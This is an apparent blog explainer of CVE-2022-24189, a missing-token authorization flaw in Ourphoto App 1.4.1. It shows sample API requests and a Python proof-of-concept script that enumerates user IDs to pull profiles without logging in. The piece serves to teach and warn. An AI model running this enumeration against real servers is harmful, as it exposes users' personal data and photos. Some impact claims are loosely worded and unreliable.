CVE-2022-24189 - How a Simple Authorization Flaw in Ourphoto App 1.4.1 Exposed Sensitive User Data

In early 2022, a serious authorization vulnerability surfaced in the Ourphoto App, a platform many people use for sharing and managing photos. The bug is officially tracked as CVE-2022-24189. This flaw is shockingly simple: the app's API doesn’t actually check the user_token for authorization — meaning attackers can leave out this header and still access or modify any user's data.

Let’s break down what went wrong, how the bug works, and why it’s so dangerous for users.

What is CVE-2022-24189?

Ourphoto App, version 1.4.1 specifically, exposes a series of endpoints like /apiv1/* for user operations—things like uploading, deleting, or viewing photos. Ordinarily, these endpoints require a user_token in the HTTP Authorization header. But due to poor handling on the backend, removing the token means requests are still accepted—no questions asked!

In plain English:  
The backend doesn’t actually check who you are if you just skip sending a token. Anyone can use the app as any user.

Under normal circumstances, to view a user’s info, the app expects something like

POST /apiv1/getUserProfile
Authorization: user_token_abcdefgh123456

{
    "user_id": "123456"
}

If you’re not logged in, or your token is wrong, the server should say, “Nope! Unauthorized!”

But with CVE-2022-24189, you just... leave off the Authorization header

POST /apiv1/getUserProfile

{
    "user_id": "123456"
}

Here’s a simple proof-of-concept (for learning/research only!)

import requests

# Target server
url = "https://ourphoto.com/apiv1/getUserProfile";

for user_id in range(100000, 100100):  # Enumerate some user IDs
    data = {"user_id": str(user_id)}
    # No Authorization header sent!
    resp = requests.post(url, json=data)
    if resp.status_code == 200 and "username" in resp.text:
        print(f"User info for {user_id}: {resp.text}")

If this were a real attack, the attacker could loop through all possible IDs and collect a full database of users. No login needed.

Full Impact

- Account Takeover: Attackers can't change passwords (unless further bugs exist), but they can see personal data, photos, and possibly make actions as other users.
- Data Leak: An attacker can download photos, email addresses, and private info of anyone using the app.

References and Further Reading

- Official NVD CVE entry: CVE-2022-24189
- Security advisory: https://www.exploit-db.com/exploits/50745
- Reddit post explaining the issue in simple terms: Reddit link

How Could It Have Been Prevented?

- Always validate authorization! Any API endpoint that acts on user data must *require* and *validate* the token.

Conclusion

CVE-2022-24189 is a textbook example of how skipping a simple security check can put all your users at risk. If you use Ourphoto App version 1.4.1, update right away. And if you're a developer, never trust API requests without strict authentication—one small oversight can lead to big leaks.

Stay Safe!

If you want to dig deeper into this vulnerability, check the references above and always keep your apps up-to-date. Think you might be affected? Contact the vendor and consider changing your passwords and photos ASAP!

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:20:00 UTC